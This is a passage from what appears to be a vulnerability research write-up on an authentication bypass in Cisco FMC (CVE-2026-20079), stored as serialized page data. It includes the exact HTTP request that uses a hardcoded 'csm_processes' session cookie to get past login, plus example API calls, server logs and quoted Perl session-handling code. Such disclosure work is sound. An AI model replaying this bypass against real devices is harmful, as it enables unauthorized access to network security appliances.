IE=edge\n",[1373,6448,6449,6452,6454],{"class":1375,"line":4806},[1373,6450,6451],{"class":6300},"X-Permitted-Cross-Domain-Policies",[1373,6453,4606],{"class":5387},[1373,6455,6456],{"class":1391}," none\n",[1373,6458,6459,6462,6464],{"class":1375,"line":4817},[1373,6460,6461],{"class":6300},"X-XSS-Protection",[1373,6463,4606],{"class":5387},[1373,6465,6466],{"class":1391}," 1; mode=block\n",[1373,6468,6469,6472,6474],{"class":1375,"line":4825},[1373,6470,6471],{"class":6300},"Referrer-Policy",[1373,6473,4606],{"class":5387},[1373,6475,6476],{"class":1391}," 
same-origin\n",[1373,6478,6479,6482,6484],{"class":1375,"line":4835},[1373,6480,6481],{"class":6300},"Content-Security-Policy",[1373,6483,4606],{"class":5387},[1373,6485,6486],{"class":1391}," base-uri 'self'; frame-ancestors 'self'\n",[1373,6488,6489,6492,6494],{"class":1375,"line":4843},[1373,6490,6491],{"class":6300},"X-Content-Type-Options",[1373,6493,4606],{"class":5387},[1373,6495,6496],{"class":1391}," nosniff\n",[1373,6498,6499,6502,6504],{"class":1375,"line":4849},[1373,6500,6501],{"class":6300},"Keep-Alive",[1373,6503,4606],{"class":5387},[1373,6505,6506],{"class":1391}," timeout=5, max=100\n",[1373,6508,6509,6511,6513],{"class":1375,"line":4877},[1373,6510,6331],{"class":6300},[1373,6512,4606],{"class":5387},[1373,6514,6515],{"class":1391}," Keep-Alive\n",[1373,6517,6518],{"class":1375,"line":4915},[1373,6519,6520],{"emptyLinePlaceholder":237},"\n",[1373,6522,6523],{"class":1375,"line":4931},[1373,6524,6525],{"class":4640},"Invalid session ID\n",[18,6527,6528,6529,6531,6532,6535],{},"But, with our special ",[886,6530,4442],{}," session ID, we reach the page and get a HTTP ",[886,6533,6534],{},"200"," response, and the system data renders:",[1354,6537,6539],{"className":6275,"code":6538,"language":6277,"meta":219,"style":219},"GET \u002Fhelp\u002Fabout.cgi HTTP\u002F1.1\nHost: 10.0.0.226\nCookie: CGISESSID=csm_processes\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\nAccept-Encoding: gzip, deflate, br\nConnection: 
keep-alive\n\n\n",[886,6540,6541,6553,6561,6571,6579,6587],{"__ignoreMap":219},[1373,6542,6543,6545,6547,6549,6551],{"class":1375,"line":1376},[1373,6544,6284],{"class":4636},[1373,6546,6287],{"class":4640},[1373,6548,6290],{"class":5387},[1373,6550,2180],{"class":4640},[1373,6552,6295],{"class":5467},[1373,6554,6555,6557,6559],{"class":1375,"line":220},[1373,6556,6301],{"class":6300},[1373,6558,4606],{"class":5387},[1373,6560,6306],{"class":1391},[1373,6562,6563,6566,6568],{"class":1375,"line":1266},[1373,6564,6565],{"class":6300},"Cookie",[1373,6567,4606],{"class":5387},[1373,6569,6570],{"class":1391}," CGISESSID=csm_processes\n",[1373,6572,6573,6575,6577],{"class":1375,"line":1852},[1373,6574,6311],{"class":6300},[1373,6576,4606],{"class":5387},[1373,6578,6316],{"class":1391},[1373,6580,6581,6583,6585],{"class":1375,"line":4692},[1373,6582,6321],{"class":6300},[1373,6584,4606],{"class":5387},[1373,6586,6326],{"class":1391},[1373,6588,6589,6591,6593],{"class":1375,"line":4724},[1373,6590,6331],{"class":6300},[1373,6592,4606],{"class":5387},[1373,6594,6336],{"class":1391},[1354,6596,6598],{"className":6275,"code":6597,"language":6277,"meta":219,"style":219},"HTTP\u002F1.1 200 OK\nDate: Wed, 25 Mar 2026 19:28:23 GMT\nServer: Mojolicious (Perl)\nStrict-Transport-Security: max-age=31536000; includeSubDomains\nVary: Accept-Encoding\nCache-Control: no-store\nX-Frame-Options: SAMEORIGIN\nX-UA-Compatible: IE=edge\nX-Permitted-Cross-Domain-Policies: none\nX-XSS-Protection: 1; mode=block\nReferrer-Policy: same-origin\nContent-Security-Policy: base-uri 'self'; frame-ancestors 'self'\nX-Content-Type-Options: nosniff\nContent-Length: 25555\nKeep-Alive: timeout=5, max=100\nConnection: Keep-Alive\nContent-Type: text\u002Fhtml; charset=utf-8\n\n\u003C!DOCTYPE 
html>\n\n\n\n...snip...\n",[886,6599,6600,6614,6623,6631,6639,6649,6657,6665,6673,6681,6689,6697,6705,6713,6722,6730,6738,6747,6751,6766,6770,6774,6779],{"__ignoreMap":219},[1373,6601,6602,6604,6606,6608,6611],{"class":1375,"line":1376},[1373,6603,6290],{"class":5387},[1373,6605,2180],{"class":4640},[1373,6607,6350],{"class":5467},[1373,6609,6610],{"class":5467}," 200",[1373,6612,6613],{"class":1391}," OK\n",[1373,6615,6616,6618,6620],{"class":1375,"line":220},[1373,6617,6361],{"class":6300},[1373,6619,4606],{"class":5387},[1373,6621,6622],{"class":1391}," Wed, 25 Mar 2026 19:28:23 GMT\n",[1373,6624,6625,6627,6629],{"class":1375,"line":1266},[1373,6626,6371],{"class":6300},[1373,6628,4606],{"class":5387},[1373,6630,6376],{"class":1391},[1373,6632,6633,6635,6637],{"class":1375,"line":1852},[1373,6634,6381],{"class":6300},[1373,6636,4606],{"class":5387},[1373,6638,6386],{"class":1391},[1373,6640,6641,6644,6646],{"class":1375,"line":4692},[1373,6642,6643],{"class":6300},"Vary",[1373,6645,4606],{"class":5387},[1373,6647,6648],{"class":1391}," 
Accept-Encoding\n",[1373,6650,6651,6653,6655],{"class":1375,"line":4724},[1373,6652,6421],{"class":6300},[1373,6654,4606],{"class":5387},[1373,6656,6426],{"class":1391},[1373,6658,6659,6661,6663],{"class":1375,"line":4756},[1373,6660,6431],{"class":6300},[1373,6662,4606],{"class":5387},[1373,6664,6436],{"class":1391},[1373,6666,6667,6669,6671],{"class":1375,"line":4768},[1373,6668,6441],{"class":6300},[1373,6670,4606],{"class":5387},[1373,6672,6446],{"class":1391},[1373,6674,6675,6677,6679],{"class":1375,"line":4792},[1373,6676,6451],{"class":6300},[1373,6678,4606],{"class":5387},[1373,6680,6456],{"class":1391},[1373,6682,6683,6685,6687],{"class":1375,"line":4798},[1373,6684,6461],{"class":6300},[1373,6686,4606],{"class":5387},[1373,6688,6466],{"class":1391},[1373,6690,6691,6693,6695],{"class":1375,"line":4806},[1373,6692,6471],{"class":6300},[1373,6694,4606],{"class":5387},[1373,6696,6476],{"class":1391},[1373,6698,6699,6701,6703],{"class":1375,"line":4817},[1373,6700,6481],{"class":6300},[1373,6702,4606],{"class":5387},[1373,6704,6486],{"class":1391},[1373,6706,6707,6709,6711],{"class":1375,"line":4825},[1373,6708,6491],{"class":6300},[1373,6710,4606],{"class":5387},[1373,6712,6496],{"class":1391},[1373,6714,6715,6717,6719],{"class":1375,"line":4835},[1373,6716,6411],{"class":6300},[1373,6718,4606],{"class":5387},[1373,6720,6721],{"class":1391}," 25555\n",[1373,6723,6724,6726,6728],{"class":1375,"line":4843},[1373,6725,6501],{"class":6300},[1373,6727,4606],{"class":5387},[1373,6729,6506],{"class":1391},[1373,6731,6732,6734,6736],{"class":1375,"line":4849},[1373,6733,6331],{"class":6300},[1373,6735,4606],{"class":5387},[1373,6737,6515],{"class":1391},[1373,6739,6740,6742,6744],{"class":1375,"line":4877},[1373,6741,6391],{"class":6300},[1373,6743,4606],{"class":5387},[1373,6745,6746],{"class":1391}," text\u002Fhtml; 
charset=utf-8\n",[1373,6748,6749],{"class":1375,"line":4915},[1373,6750,6520],{"emptyLinePlaceholder":237},[1373,6752,6753,6756,6759,6763],{"class":1375,"line":4931},[1373,6754,6755],{"class":1383},"\u003C!",[1373,6757,6758],{"class":5387},"DOCTYPE",[1373,6760,6762],{"class":6761},"sSsL9"," html",[1373,6764,6765],{"class":1383},">\n",[1373,6767,6768],{"class":1375,"line":4947},[1373,6769,6520],{"emptyLinePlaceholder":237},[1373,6771,6772],{"class":1375,"line":4952},[1373,6773,6520],{"emptyLinePlaceholder":237},[1373,6775,6777],{"class":1375,"line":6776},22,[1373,6778,6520],{"emptyLinePlaceholder":237},[1373,6780,6782],{"class":1375,"line":6781},23,[1373,6783,6784],{"class":4640},"...snip...\n",[18,6786,6787],{},[68,6788],{"alt":6789,"src":6790},"Authentication bypass for the auth dialogue.","\u002Fblog\u002Fcisco-fmc-auth-bypass-cve-2026-20079\u002Fhelp-dialog.png",[18,6792,6793],{},"Sweet! It appears we found the issue, and it looks to be as easy as using a hardcoded session. Now we can just set our cookie to that value and try and reach any of the pages.... 
and every page functionally triggers the following error:",[18,6795,6796],{},[68,6797],{"alt":6798,"src":6799},"Authentication failing on most pages.","\u002Fblog\u002Fcisco-fmc-auth-bypass-cve-2026-20079\u002Fui-failure.png",[61,6801,6803],{"id":6802},"its-never-that-easy","It's Never That Easy",[18,6805,6806],{},"Using the hardcoded session and reaching for any of the endpoints triggers errors in the log similar to the following:",[1354,6808,6811],{"className":6809,"code":6810,"language":1359},[1357],"[2026-03-25 19:41:00.32860] [14601] [debug] 200 OK (2.203898s, 0.454\u002Fs)\n[2026-03-25 19:41:00.32865] [14601] [debug] after dispatch worker inspection\n[2026-03-25 19:41:46.03099] [14601] [debug] Resetting modules...\n[2026-03-25 19:41:46.03807] [14601] [debug] Module reset complete\n[2026-03-25 19:41:46.03828] [14601] [debug] GET \"\u002Fplatinum\u002FApplianceInformation.cgi\" (27828f1b)\n[2026-03-25 19:41:46.03841] [14601] [debug] Routing to controller \"SF::Mojo::Handlers::ApplianceInformationHandler\" and action \"mojo_handler\"\n[2026-03-25 19:41:46.03895] [14601] [info] handle_auth: Trying to connect to \u002Fplatinum\u002FApplianceInformation.cgi\n[2026-03-25 19:41:46.04650] [14601] [info] User [csm_processes] does not have page permission [configuration]. Access denied. 
at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FAuth.pm line 3268.\n[2026-03-25 19:41:46.04675] [14601] [info] Unauthorized access to \u002Fplatinum\u002FApplianceInformation.cgi\n        called from SF::Util::Stacktrace::ToString at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FMojo\u002FCommonUtils.pm, line 119\n        called from SF::Mojo::CommonUtils::Unauthorized at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FMojo\u002FCommonUtils.pm, line 266\n        called from SF::Mojo::CommonUtils::handle_auth at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FMojo\u002FHandlers\u002FApplianceInformationHandler.pm, line 19\n...snip...\n        called from Mojo::Server::Prefork::_spawn at \u002Fusr\u002Flib64\u002Fperl5\u002Fsite_perl\u002F5.34.1\u002FMojo\u002FServer\u002FPrefork.pm, line 100\n        called from Mojo::Server::Prefork::_manage at \u002Fusr\u002Flib64\u002Fperl5\u002Fsite_perl\u002F5.34.1\u002FMojo\u002FServer\u002FPrefork.pm, line 85\n        called from Mojo::Server::Prefork::run at \u002Fusr\u002Flib64\u002Fperl5\u002Fsite_perl\u002F5.34.1\u002FMojo\u002FServer\u002FHypnotoad.pm, line 74\n        called from Mojo::Server::Hypnotoad::run at \u002Fusr\u002Flocal\u002Fsf\u002Fbin\u002Fmojo_server_wrapper.pl, line 38\n[2026-03-25 19:41:46.04803] [14601] [info] Use of uninitialized value $key in concatenation (.) or string at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FAuth.pm line 4217.\n[2026-03-25 19:41:46.04806] [14601] [info] getSFActionID: \u003C> **************************************************** at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FAuth.pm line 4217.\n[2026-03-25 19:41:48.04822] [14601] [info] Use of uninitialized value $key in concatenation (.) 
or string at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FAuth.pm line 4217.\n[2026-03-25 19:41:48.04829] [14601] [info] getSFActionID: \u003C> **************************************************** at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FAuth.pm line 4217.\n[2026-03-25 19:41:48.21809] [14601] [info] Use of uninitialized value in string eq at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FAmplitude.pm line 40.\n[2026-03-25 19:41:48.22680] [14601] [debug] 200 OK (2.188507s, 0.457\u002Fs)\n[2026-03-25 19:41:48.22691] [14601] [debug] after dispatch worker inspection\n",[886,6812,6810],{"__ignoreMap":219},[18,6814,6815],{},"As it turns out, nearly every CGI page of the application contains a snippet similar to the following:",[1354,6817,6819],{"className":4621,"code":6818,"language":4623,"meta":219,"style":219},"use SF::Auth;\nmy $session = SF::Auth::GetSession($cgi);\nSF::Auth::CheckLogin($cgi, $session);\n",[886,6820,6821,6828,6843],{"__ignoreMap":219},[1373,6822,6823,6825],{"class":1375,"line":1376},[1373,6824,4976],{"class":4636},[1373,6826,6827],{"class":4640}," SF::Auth;\n",[1373,6829,6830,6833,6835,6838,6840],{"class":1375,"line":220},[1373,6831,6832],{"class":4652},"my",[1373,6834,4656],{"class":1383},[1373,6836,6837],{"class":4640},"session = SF::Auth::GetSession(",[1373,6839,4644],{"class":1383},[1373,6841,6842],{"class":4640},"cgi);\n",[1373,6844,6845,6848,6850,6853,6855],{"class":1375,"line":1266},[1373,6846,6847],{"class":4640},"SF::Auth::CheckLogin(",[1373,6849,4644],{"class":1383},[1373,6851,6852],{"class":4640},"cgi, ",[1373,6854,4644],{"class":1383},[1373,6856,4944],{"class":4640},[18,6858,6859,6860,6863,6864,6867,6868,6871,6872,6875,6876,6878,6879,6882],{},"Internally to the application, the current session username is cross-referenced with the permission logic ",[886,6861,6862],{},"Permission.pm"," module, and uses the permissions assigned to the user for whenever 
",[886,6865,6866],{},"CheckLogin"," is run. This means we can pass the basic authentication check for any page that only uses ",[886,6869,6870],{},"SF::Auth::GetSession",", but any calls to ",[886,6873,6874],{},"SF::Auth::CheckLogin"," or a direct permission check will require the user's permissions. So what permissions does our ",[886,6877,4442],{}," user have? None. Turns out the machine user does ",[1131,6880,6881],{},"not"," have any permissions assigned, and we are functionally restricted to the lowest-privileged user account.",[18,6884,6885],{},"This immediately presented a huge problem, as we generally could not interact with any of the APIs or CGI scripts (with very few exceptions). We began checking the authentication logic for a set of entry points, testing as many as we could find and cross-referencing what a normal admin UI user would be able to interact with.",[18,6887,6888,6889,6892],{},"Testing showed that we only had access to a small handful of API calls that checked session validity, a few CGI scripts, and not a single one of the ",[886,6890,6891],{},"\u002Fapi"," routes in Apache. 
We got stuck here for quite a while attempting to find what we could access with our minimally privileged user, as the words \"successful exploit could allow the attacker to execute a variety of scripts and commands that allow root access to the device\" echoed in our heads.",[18,6894,6895,6896,6898,6899,6901],{},"Our UI login testing and cross-referencing with the ",[886,6897,4442],{}," session showed a couple of exceptions to the ",[886,6900,6866],{}," logic that stood out:",[22,6903,6904,6917],{},[25,6905,2245,6906,6908,6909,6912,6913,6916],{},[886,6907,4491],{}," script that appears to be used for bulk API requests does not directly check logins, only sessions; but then it cross-references the permissions that are callable with a set of permission maps to functions defined in ",[886,6910,6911],{},"sf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FUI\u002FPJB.pm",". This includes a special ",[886,6914,6915],{},"all"," permission.",[25,6918,2245,6919,6922,6923,6926],{},[886,6920,6921],{},"sajaxintf.cgi"," script handles async AJAX requests; it has a set of functions that any user appears to be able to call, and that correlate to functions defined in ",[886,6924,6925],{},"sf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FUI\u002FSajaxIntf.pm"," that individually appear to perform most of their logic.",[18,6928,6929,6930,6932,6933,6936],{},"Great, those sound like perfect candidates, but both of these APIs have odd interfaces. For ",[886,6931,6921],{},", requests are sent as a JSON array, and the ordered arguments correlate to the application functions and their arguments. The following call sends a request to the ",[886,6934,6935],{},"batchResults"," function. 
All the following parameters are arguments for that function:",[1354,6938,6940],{"className":6275,"code":6939,"language":6277,"meta":219,"style":219},"POST \u002Fsajaxintf.cgi?rs=callServerFunc&rstime=1772847841952 HTTP\u002F1.1\nHost: 10.0.0.226\nCookie: CGISESSID=199ceac425aaa91610edd959ce049568\nContent-Length: 143\nAccept-Language: en-US,en;q=0.9\nContent-Type: application\u002Fjson\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\nAccept: *\u002F*\nConnection: keep-alive\n\n[\"a490cd6e67ccde81d131684846d7a13c\",\"batchResults\",null,10000,\"getRulesForCategory\",\"policy_modifications\",\"\",\"\",\"Category::browser-chrome\",\"\"]\n",[886,6941,6942,6956,6964,6973,6982,6992,7001,7009,7019,7027,7031],{"__ignoreMap":219},[1373,6943,6944,6947,6950,6952,6954],{"class":1375,"line":1376},[1373,6945,6946],{"class":4636},"POST",[1373,6948,6949],{"class":4640}," \u002Fsajaxintf.cgi?rs=callServerFunc&rstime=1772847841952 ",[1373,6951,6290],{"class":5387},[1373,6953,2180],{"class":4640},[1373,6955,6295],{"class":5467},[1373,6957,6958,6960,6962],{"class":1375,"line":220},[1373,6959,6301],{"class":6300},[1373,6961,4606],{"class":5387},[1373,6963,6306],{"class":1391},[1373,6965,6966,6968,6970],{"class":1375,"line":1266},[1373,6967,6565],{"class":6300},[1373,6969,4606],{"class":5387},[1373,6971,6972],{"class":1391}," CGISESSID=199ceac425aaa91610edd959ce049568\n",[1373,6974,6975,6977,6979],{"class":1375,"line":1852},[1373,6976,6411],{"class":6300},[1373,6978,4606],{"class":5387},[1373,6980,6981],{"class":1391}," 143\n",[1373,6983,6984,6987,6989],{"class":1375,"line":4692},[1373,6985,6986],{"class":6300},"Accept-Language",[1373,6988,4606],{"class":5387},[1373,6990,6991],{"class":1391}," en-US,en;q=0.9\n",[1373,6993,6994,6996,6998],{"class":1375,"line":4724},[1373,6995,6391],{"class":6300},[1373,6997,4606],{"class":5387},[1373,6999,7000],{"class":1391}," 
application\u002Fjson\n",[1373,7002,7003,7005,7007],{"class":1375,"line":4756},[1373,7004,6311],{"class":6300},[1373,7006,4606],{"class":5387},[1373,7008,6316],{"class":1391},[1373,7010,7011,7014,7016],{"class":1375,"line":4768},[1373,7012,7013],{"class":6300},"Accept",[1373,7015,4606],{"class":5387},[1373,7017,7018],{"class":1391}," *\u002F*\n",[1373,7020,7021,7023,7025],{"class":1375,"line":4792},[1373,7022,6331],{"class":6300},[1373,7024,4606],{"class":5387},[1373,7026,6336],{"class":1391},[1373,7028,7029],{"class":1375,"line":4798},[1373,7030,6520],{"emptyLinePlaceholder":237},[1373,7032,7033,7036,7038,7040,7042,7044,7046,7048,7050,7052,7056,7058,7061,7063,7065,7068,7070,7072,7074,7077,7079,7081,7084,7086,7088,7090,7092,7095,7097,7099,7101],{"class":1375,"line":4806},[1373,7034,7035],{"class":1383},"[",[1373,7037,183],{"class":1387},[1373,7039,5731],{"class":1391},[1373,7041,183],{"class":1387},[1373,7043,5437],{"class":1383},[1373,7045,183],{"class":1387},[1373,7047,6935],{"class":1391},[1373,7049,183],{"class":1387},[1373,7051,5437],{"class":1383},[1373,7053,7055],{"class":7054},"sMTiH","null",[1373,7057,5437],{"class":1383},[1373,7059,7060],{"class":5467},"10000",[1373,7062,5437],{"class":1383},[1373,7064,183],{"class":1387},[1373,7066,7067],{"class":1391},"getRulesForCategory",[1373,7069,183],{"class":1387},[1373,7071,5437],{"class":1383},[1373,7073,183],{"class":1387},[1373,7075,7076],{"class":1391},"policy_modifications",[1373,7078,183],{"class":1387},[1373,7080,5437],{"class":1383},[1373,7082,7083],{"class":1387},"\"\"",[1373,7085,5437],{"class":1383},[1373,7087,7083],{"class":1387},[1373,7089,5437],{"class":1383},[1373,7091,183],{"class":1387},[1373,7093,7094],{"class":1391},"Category::browser-chrome",[1373,7096,183],{"class":1387},[1373,7098,5437],{"class":1383},[1373,7100,7083],{"class":1387},[1373,7102,7103],{"class":1383},"]\n",[18,7105,7106,7107,7109,7110,7113,7114,7117,7118,7121,7122,7125],{},"Meanwhile, the ",[886,7108,4491],{}," script has a 
similar interface, but instead uses form value fields and a ",[886,7111,7112],{},"parameter"," field that contains the JSON array field that corresponds to a Perl object. In the following example the ",[886,7115,7116],{},"SF::IdentityPolicy::IdentityPolicy::getPolicyList"," function is called and ",[886,7119,7120],{},"parameters"," is an encoded empty JSON array (",[886,7123,7124],{},"[]",") indicating no arguments are passed:",[1354,7127,7129],{"className":6275,"code":7128,"language":6277,"meta":219,"style":219},"POST \u002Fpjb.cgi HTTP\u002F1.1\nHost: 10.0.0.226\nCookie: CGISESSID=199ceac425aaa91610edd959ce049568\nContent-Length: 177\nAccept-Language: en-US,en;q=0.9\nContent-Type: application\u002Fx-www-form-urlencoded\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\nAccept: *\u002F*\nConnection: keep-alive\n\n&function=SF::IdentityPolicy::IdentityPolicy::getPolicyList&parameters=%5B%5D&get_all_errors=1&sf_action_id=a490cd6e67ccde81d131684846d7a13c&ss=IdentityPolicyList&am=Page%20View\n",[886,7130,7131,7144,7152,7160,7169,7177,7186,7194,7202,7210,7214],{"__ignoreMap":219},[1373,7132,7133,7135,7138,7140,7142],{"class":1375,"line":1376},[1373,7134,6946],{"class":4636},[1373,7136,7137],{"class":4640}," \u002Fpjb.cgi ",[1373,7139,6290],{"class":5387},[1373,7141,2180],{"class":4640},[1373,7143,6295],{"class":5467},[1373,7145,7146,7148,7150],{"class":1375,"line":220},[1373,7147,6301],{"class":6300},[1373,7149,4606],{"class":5387},[1373,7151,6306],{"class":1391},[1373,7153,7154,7156,7158],{"class":1375,"line":1266},[1373,7155,6565],{"class":6300},[1373,7157,4606],{"class":5387},[1373,7159,6972],{"class":1391},[1373,7161,7162,7164,7166],{"class":1375,"line":1852},[1373,7163,6411],{"class":6300},[1373,7165,4606],{"class":5387},[1373,7167,7168],{"class":1391}," 
177\n",[1373,7170,7171,7173,7175],{"class":1375,"line":4692},[1373,7172,6986],{"class":6300},[1373,7174,4606],{"class":5387},[1373,7176,6991],{"class":1391},[1373,7178,7179,7181,7183],{"class":1375,"line":4724},[1373,7180,6391],{"class":6300},[1373,7182,4606],{"class":5387},[1373,7184,7185],{"class":1391}," application\u002Fx-www-form-urlencoded\n",[1373,7187,7188,7190,7192],{"class":1375,"line":4756},[1373,7189,6311],{"class":6300},[1373,7191,4606],{"class":5387},[1373,7193,6316],{"class":1391},[1373,7195,7196,7198,7200],{"class":1375,"line":4768},[1373,7197,7013],{"class":6300},[1373,7199,4606],{"class":5387},[1373,7201,7018],{"class":1391},[1373,7203,7204,7206,7208],{"class":1375,"line":4792},[1373,7205,6331],{"class":6300},[1373,7207,4606],{"class":5387},[1373,7209,6336],{"class":1391},[1373,7211,7212],{"class":1375,"line":4798},[1373,7213,6520],{"emptyLinePlaceholder":237},[1373,7215,7216,7219,7222],{"class":1375,"line":4806},[1373,7217,7218],{"class":1397},"&",[1373,7220,7221],{"class":4640},"function=",[1373,7223,7224],{"class":1391},"SF::IdentityPolicy::IdentityPolicy::getPolicyList&parameters=%5B%5D&get_all_errors=1&sf_action_id=a490cd6e67ccde81d131684846d7a13c&ss=IdentityPolicyList&am=Page%20View\n",[18,7226,7227,7228,7230,7231,7233,7234,7236,7237,7239,7240,7242,7243,7245],{},"As you may have noticed, both requests contain the value ",[886,7229,5731],{},", the first in the first array parameter and the second in the ",[886,7232,4468],{}," parameter. This is where the next hurdle comes into play, because this value acts as a CSRF token that is tied to user sessions. Looking at the original startup-created session SQL response, we see that the ",[886,7235,5800],{}," user session has the ",[886,7238,4468],{}," value set, and the ",[886,7241,4442],{}," session does not. 
This means that if we make a request to those endpoints, we will not be able to pass any of the basic validation checks, because that session does not have the ",[886,7244,4468],{}," value set. This results in the inability to call any of the functions in these applications and also causes almost all API calls to fail uniformly. These tokens also correlate directly to the session value, so they are not reusable between user sessions.",[18,7247,7248,7249,7251],{},"We need to get a ",[886,7250,4468],{}," or a permission upgrade to be able to functionally do anything beyond version checking.",[61,7253,7255],{"id":7254},"session-upgrade","Session Upgrade",[18,7257,7258,7259,7262,7263,7265,7266,7268,7269,7271,7272,7274],{},"Our first thought was to look at all the session value manipulations and any interactions with permissions, which turned out to be a dead end: in our testing, there were almost no session manipulations that could occur unauthenticated. Our second idea was to look at other APIs and reverse ",[886,7260,7261],{},"auth-daemon"," for any interactions. Midway through that long process and many failed sinks, something occurred to me. The ",[886,7264,4442],{}," session value isn't inherently tied to the ",[886,7267,4442],{}," authentication. 
According to the ",[886,7270,4965],{}," code, an authentication to the login page would happily take an existing session value and make a new session for the user — ",[1131,7273,297],{}," it would happily initialize a set of options on the existing session:",[1354,7276,7278],{"className":4621,"code":7277,"language":4623,"meta":219,"style":219},"my $authing = 0;\nsub GetSession {\n    my ($q, $silent) = @_;\n    #warn \"Get Session not silent: \".SF::Util::Stacktrace::ToString() if (!$silent);\n\n    # Return the cached session if we have one\n    return $_SESSION if (defined $_SESSION);\n\n    $q = new SF if !defined $q;\n\n    # If they were fishing for a cached session but there isn't one, return no session\n    my $sid;\n    if (ref($q) eq 'Mojo::Message::Request') {\n        $sid = find_session_id_from_cookies($q->cookies);\n    } else {\n        # Get the session ID from the cookie\n        $sid = $q->cookie($CGI::Session::NAME);\n    }\n    return undef if !defined $sid;\n\n    # Initialize sfclient\n    return undef if (sfclient::sfclient_Init() != 0);\n\n    # Cache the session and return it\n    $_SESSION = MakeSession($sid, $silent);\n    if (ref($q) eq 'Mojo::Message::Request') {\n        $CURRENT_REQ_URL = $q->url->path->to_string;\n        $CURRENT_REQ_METHOD = $q->method;\n        setCurrentReqParams($q->params->to_hash);\n    }\n    else {\n        $CURRENT_REQ_URL = $q->url( -absolute => 1);\n        $CURRENT_REQ_METHOD = $q->request_method;\n        setCurrentReqParams(scalar $q->Vars());\n    }\n    return $_SESSION;\n}\n",[886,7279,7280,7289,7301,7322,7327,7331,7336,7354,7358,7378,7382,7387,7396,7420,7436,7444,7449,7470,7474,7492,7496,7501,7518,7522,7528,7544,7569,7596,7613,7633,7638,7646,7670,7686,7707,7712,7720],{"__ignoreMap":219},[1373,7281,7282,7284,7286],{"class":1375,"line":1376},[1373,7283,6832],{"class":4652},[1373,7285,4656],{"class":1383},[1373,7287,7288],{"class":4640},"authing = 
0;\n",[1373,7290,7291,7295,7299],{"class":1375,"line":220},[1373,7292,7294],{"class":7293},"srJo8","sub",[1373,7296,7298],{"class":7297},"sD0ED"," GetSession",[1373,7300,4765],{"class":4640},[1373,7302,7303,7305,7307,7309,7311,7313,7316,7319],{"class":1375,"line":1266},[1373,7304,4653],{"class":4652},[1373,7306,4641],{"class":4640},[1373,7308,4644],{"class":1383},[1373,7310,4939],{"class":4640},[1373,7312,4644],{"class":1383},[1373,7314,7315],{"class":4640},"silent) = ",[1373,7317,7318],{"class":1383},"@",[1373,7320,7321],{"class":4640},"_;\n",[1373,7323,7324],{"class":1375,"line":1852},[1373,7325,7326],{"class":4630},"    #warn \"Get Session not silent: \".SF::Util::Stacktrace::ToString() if (!$silent);\n",[1373,7328,7329],{"class":1375,"line":4692},[1373,7330,6520],{"emptyLinePlaceholder":237},[1373,7332,7333],{"class":1375,"line":4724},[1373,7334,7335],{"class":4630},"    # Return the cached session if we have one\n",[1373,7337,7338,7341,7344,7346,7348,7351],{"class":1375,"line":4756},[1373,7339,7340],{"class":4636},"    return",[1373,7342,7343],{"class":4640}," $_SESSION ",[1373,7345,4637],{"class":4636},[1373,7347,4641],{"class":4640},[1373,7349,7350],{"class":1379},"defined",[1373,7352,7353],{"class":4640}," $_SESSION);\n",[1373,7355,7356],{"class":1375,"line":4768},[1373,7357,6520],{"emptyLinePlaceholder":237},[1373,7359,7360,7363,7366,7368,7371,7373,7375],{"class":1375,"line":4792},[1373,7361,7362],{"class":1383},"    $",[1373,7364,7365],{"class":4640},"q = new SF ",[1373,7367,4637],{"class":4636},[1373,7369,7370],{"class":4640}," !",[1373,7372,7350],{"class":1379},[1373,7374,4656],{"class":1383},[1373,7376,7377],{"class":4640},"q;\n",[1373,7379,7380],{"class":1375,"line":4798},[1373,7381,6520],{"emptyLinePlaceholder":237},[1373,7383,7384],{"class":1375,"line":4806},[1373,7385,7386],{"class":4630},"    # If they were fishing for a cached session but there isn't one, return no 
session\n",[1373,7388,7389,7391,7393],{"class":1375,"line":4817},[1373,7390,4653],{"class":4652},[1373,7392,4656],{"class":1383},[1373,7394,7395],{"class":4640},"sid;\n",[1373,7397,7398,7400,7402,7404,7406,7408,7410,7412,7414,7416,7418],{"class":1375,"line":4825},[1373,7399,4695],{"class":4636},[1373,7401,4641],{"class":4640},[1373,7403,4700],{"class":1379},[1373,7405,1384],{"class":4640},[1373,7407,4644],{"class":1383},[1373,7409,4707],{"class":4640},[1373,7411,4710],{"class":1379},[1373,7413,4713],{"class":1387},[1373,7415,4716],{"class":1391},[1373,7417,1388],{"class":1387},[1373,7419,4721],{"class":4640},[1373,7421,7422,7424,7427,7429,7431,7433],{"class":1375,"line":4835},[1373,7423,4727],{"class":1383},[1373,7425,7426],{"class":4640},"sid = find_session_id_from_cookies(",[1373,7428,4644],{"class":1383},[1373,7430,4735],{"class":4640},[1373,7432,4667],{"class":1397},[1373,7434,7435],{"class":4640},"cookies);\n",[1373,7437,7438,7440,7442],{"class":1375,"line":4843},[1373,7439,4759],{"class":4640},[1373,7441,4762],{"class":4636},[1373,7443,4765],{"class":4640},[1373,7445,7446],{"class":1375,"line":4849},[1373,7447,7448],{"class":4630},"        # Get the session ID from the 